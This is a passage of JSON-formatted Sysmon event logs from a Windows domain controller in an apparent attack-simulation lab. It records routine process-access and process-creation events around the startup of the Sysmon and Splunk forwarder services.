C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1611,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1612,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1613,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1614,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1615,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.908\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.908","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1616,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.424\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2808\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.424","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2808","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1617,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.424\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.424","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1618,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
